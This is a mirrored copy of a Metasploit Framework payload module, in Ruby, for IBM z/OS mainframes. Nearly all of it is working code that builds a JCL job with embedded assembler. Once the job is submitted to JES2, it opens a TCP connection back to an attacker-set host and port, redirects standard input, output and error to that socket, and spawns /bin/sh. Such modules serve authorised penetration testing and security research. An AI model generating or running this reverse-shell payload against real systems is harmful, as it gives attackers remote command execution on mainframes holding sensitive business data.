Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb
Views: 11777
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3# This payload has no ebcdic<->ascii translator built in.4# Therefore it must use a shell which does, like mainframe_shell5#6# this payload will spawn a reverse shell from z/os, when submitted7# on the system as JCL to JES28##91011module MetasploitModule12CachedSize = 899313include Msf::Payload::Single14include Msf::Payload::Mainframe15include Msf::Sessions::CommandShellOptions1617def initialize(info = {})18super(merge_info(info,19'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',20'Description' => 'Provide JCL which creates a reverse shell21This implementation does not include ebcdic character translation,22so a client with translation capabilities is required. MSF handles23this automatically.',24'Author' => 'Bigendian Smalls',25'License' => MSF_LICENSE,26'Platform' => 'mainframe',27'Arch' => ARCH_CMD,28'Handler' => Msf::Handler::ReverseTcp,29'Session' => Msf::Sessions::MainframeShell,30'PayloadType' => 'cmd',31'RequiredCmd' => 'jcl',32'Payload' =>33{34'Offsets' => {},35'Payload' => ''36}))37register_options(38[39# need these defaulted so we can manipulate them in command_string40Opt::LHOST('0.0.0.0'),41Opt::LPORT(4444),42OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),43OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),44OptString.new('JCLASS', [true, "Job Class for JCL JOB card", "A"]),45OptString.new('NOTIFY', [false, "Notify User for JCL JOB card", ""]),46OptString.new('MSGCLASS', [true, "Message Class for JCL JOB card", "Z"]),47OptString.new('MSGLEVEL', [true, "Message Level for JCL JOB card", "(0,0)"])48], self.class49)50register_advanced_options(51[52OptBool.new('NTFYUSR', [true, "Include NOTIFY Parm?", false]),53OptString.new('JOBNAME', [true, "Job name for JCL JOB card", "DUMMY"])54],55self.class56)57end5859##60# Construct Payload61##62def generate(_opts = {})63super + command_string64end6566##67# Setup replacement vars and populate payload68##69def command_string70if (datastore['JOBNAME'] == "DUMMY") && !datastore['FTPUSER'].nil?71datastore['JOBNAME'] = (datastore['FTPUSER'] + "1").strip.upcase72end73lhost = Rex::Socket.resolv_nbo(datastore['LHOST'])74lhost = lhost.unpack("H*")[0]75lport = datastore['LPORT']76lport = lport.to_s.to_i.to_s(16).rjust(4, '0')7778jcl_jobcard +79"//**************************************/\n" \80"//* SPAWN REVERSE SHELL FOR MSF MODULE*/\n" \81"//**************************************/\n" \82"//*\n" \83"//STEP1 EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \84"//L.SYSLIB DD DSN=SYS1.CSSLIB,DISP=SHR\n" \85"//C.SYSIN DD *,DLM=ZZ\n" \86" TITLE 'Spanws Reverse Shell'\n" \87"SPAWNREV CSECT\n" \88"SPAWNREV AMODE 31\n" \89"SPAWNREV RMODE ANY\n" \90"***********************************************************************\n" \91"* @SETUP registers and save areas *\n" \92"***********************************************************************\n" \93" USING *,15\n" \94"@SETUP0 B @SETUP1\n" \95" DROP 15\n" \96" DS 0H # half word boundary\n" \97"@SETUP1 STM 14,12,12(13) # save our registers\n" \98" LR 2,13 # callers sa\n" \99" LR 8,15 # pgm base in R8\n" \100" USING @SETUP0,8 # R8 for base addressability\n" \101"*************************************\n" \102"* set up data area / addressability *\n" \103"*************************************\n" \104" L 0,@DYNSIZE # len of variable area\n" \105" GETMAIN RU,LV=(0) # get data stg, len R0\n" \106" LR 13,1 # data address\n" \107" USING @DATA,13 # addressability for data area\n" \108" ST 2,@BACK # store callers sa address\n" \109" ST 13,8(,2) # store our data addr\n" \110" DS 0H # halfword boundaries\n" \111"\n" \112"***********************************************************************\n" \113"* BPX1SOC set up socket - inline *\n" \114"***********************************************************************\n" \115" CALL BPX1SOC, X\n" \116" (DOM,TYPE,PROTO,DIM,CLIFD, X\n" \117" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \118"\n" \119"*******************************\n" \120"* chk return code, 0 or exit *\n" \121"*******************************\n" \122" LHI 15,2\n" \123" L 7,RTN_VAL\n" \124" CIB 7,0,7,EXITP # R7 not 0? Time to exit\n" \125"\n" \126"***********************************************************************\n" \127"* BPX1CON (connect) connect to remote host - inline *\n" \128"***********************************************************************\n" \129" XC SOCKADDR(16),SOCKADDR # zero sock addr struct\n" \130" MVI SOCK_FAMILY,AF_INET # family inet\n" \131" MVI SOCK_LEN,SOCK#LEN # len of socket\n" \132" MVC SOCK_SIN_PORT,CONNSOCK # port to connect to\n" \133" MVC SOCK_SIN_ADDR,CONNADDR # address to connect to\n" \134" CALL BPX1CON, X\n" \135" (CLIFD,SOCKLEN,SOCKADDR, X\n" \136" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \137"*******************************\n" \138"* chk return code, 0 or exit *\n" \139"*******************************\n" \140" LHI 15,3\n" \141" L 7,RTN_VAL\n" \142" CIB 7,0,7,EXITP # R7 not 0? Time to exit\n" \143"\n" \144"*************************************************\n" \145"* order of things to prep child pid *\n" \146"* 0) Dupe all 3 file desc of CLIFD *\n" \147"* 1) dupe parent read fd to std input *\n" \148"*************************************************\n" \149"*******************\n" \150"***** STDIN *****\n" \151"*******************\n" \152" CALL BPX1FCT, X\n" \153" (CLIFD, X\n" \154" =A(F_DUPFD2), X\n" \155" =A(F_STDI), X\n" \156" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \157"****************************************************\n" \158"* chk return code here anything but -1 is ok *\n" \159"****************************************************\n" \160" LHI 15,4 # exit code for this func\n" \161" L 7,RTN_VAL # set r7 to rtn val\n" \162" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \163"\n" \164"*******************\n" \165"***** STDOUT *****\n" \166"*******************\n" \167" CALL BPX1FCT, X\n" \168" (CLIFD, X\n" \169" =A(F_DUPFD2), X\n" \170" =A(F_STDO), X\n" \171" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \172"****************************************************\n" \173"* chk return code here anything but -1 is ok *\n" \174"****************************************************\n" \175" LHI 15,5 # exit code for this func\n" \176" L 7,RTN_VAL # set r7 to rtn val\n" \177" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \178"\n" \179"*******************\n" \180"***** STDERR *****\n" \181"*******************\n" \182" CALL BPX1FCT, X\n" \183" (CLIFD, X\n" \184" =A(F_DUPFD2), X\n" \185" =A(F_STDE), X\n" \186" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \187"****************************************************\n" \188"* chk return code here anything but -1 is ok *\n" \189"****************************************************\n" \190" LHI 15,6 # exit code for this func\n" \191" L 7,RTN_VAL # set r7 to rtn val\n" \192" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \193"\n" \194"***********************************************************************\n" \195"* BP1SPN (SPAWN) execute shell '/bin/sh' *\n" \196"***********************************************************************\n" \197" XC INHE(INHE#LENGTH),INHE # clear inhe structure\n" \198" XI INHEFLAGS0,INHESETPGROUP\n" \199" SPACE ,\n" \200" MVC INHEEYE,=C'INHE'\n" \201" LH 0,TLEN\n" \202" STH 0,INHELENGTH\n" \203" LH 0,TVER\n" \204" STH 0,INHEVERSION\n" \205" CALL BPX1SPN, X\n" \206" (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL, X\n" \207" EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL, X\n" \208" RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \209" LHI 15,7 # exit code for this func\n" \210" L 7,RTN_VAL # set r7 to rtn val\n" \211" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \212"\n" \213"****************************************************\n" \214"* cleanup & exit preload R15 with exit code *\n" \215"****************************************************\n" \216" XR 15,15 # 4 FOR rc\n" \217"EXITP L 0,@DYNSIZE\n" \218" LR 1,13\n" \219" L 13,@BACK\n" \220" DROP 13\n" \221" FREEMAIN RU,LV=(0),A=(1) # Free storage\n" \222" L 14,12(,13) # load R14\n" \223" LM 0,12,20(13) # load 0-12\n" \224" BSM 0,14 # branch to caller\n" \225"\n" \226"****************************************************\n" \227"* Constants and Variables *\n" \228"****************************************************\n" \229" DS 0F # constants full word boundary\n" \230"F_STDI EQU 0\n" \231"F_STDO EQU 1\n" \232"F_STDE EQU 2\n" \233"*************************\n" \234"* Socket conn variables * # functions used by pgm\n" \235"*************************\n" \236"CONNSOCK DC XL2'#{lport}' # LPORT\n" \237"CONNADDR DC XL4'#{lhost}' # LHOST\n" \238"DOM DC A(AF_INET) # AF_INET = 2\n" \239"TYPE DC A(SOCK#_STREAM) # stream = 1\n" \240"PROTO DC A(IPPROTO_IP) # ip = 0\n" \241"DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1\n" \242"SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)\n" \243"************************\n" \244"* BPX1SPN vars *********\n" \245"************************\n" \246"EXCMD DC CL7'/bin/sh' # command to exec\n" \247"EXCMDL DC A(L'EXCMD) # len of cmd to exec\n" \248"EXARGC DC F'1' # num of arguments\n" \249"EXARG1 DC CL2'sh' # arg 1 to exec\n" \250"EXARG1L DC A(L'EXARG1) # len of arg1\n" \251"EXARGL DC A(EXARG1) # addr of argument list\n" \252"EXARGLL DC A(EXARG1L) # addr of arg len list\n" \253"EXENVC DC F'0' # env var count\n" \254"EXENVL DC F'0' # env var arg list addr\n" \255"EXENVLL DC F'0' # env var arg len addr\n" \256"FDCNT DC F'0' # field count s/b 0\n" \257"FDLST DC F'0' # field list addr s/b 0\n" \258"TVER DC AL2(INHE#VER)\n" \259"TLEN DC AL2(INHE#LENGTH)\n" \260" SPACE ,\n" \261"@DYNSIZE DC A(@ENDYN-@DATA)\n" \262"***************************\n" \263"***** end of constants ****\n" \264"***************************\n" \265"@DATA DSECT ,\n" \266" DS 0D\n" \267"PLIST DS 16A\n" \268"RTN_VAL DS F # return value\n" \269"RTN_COD DS F # return code\n" \270"RSN_COD DS F # reason code\n" \271"CLIFD DS F # client fd\n" \272"@BACK DS A\n" \273"*\n" \274" BPXYSOCK LIST=NO,DSECT=NO\n" \275" BPXYFCTL LIST=NO,DSECT=NO\n" \276" BPXYINHE LIST=NO,DSECT=NO\n" \277"@ENDYN EQU *\n" \278"@DATA#LEN EQU *-@DATA\n" \279" BPXYCONS LIST=NO\n" \280" END SPAWNREV\n" \281"ZZ\n" \282"//*\n"283end284end285286287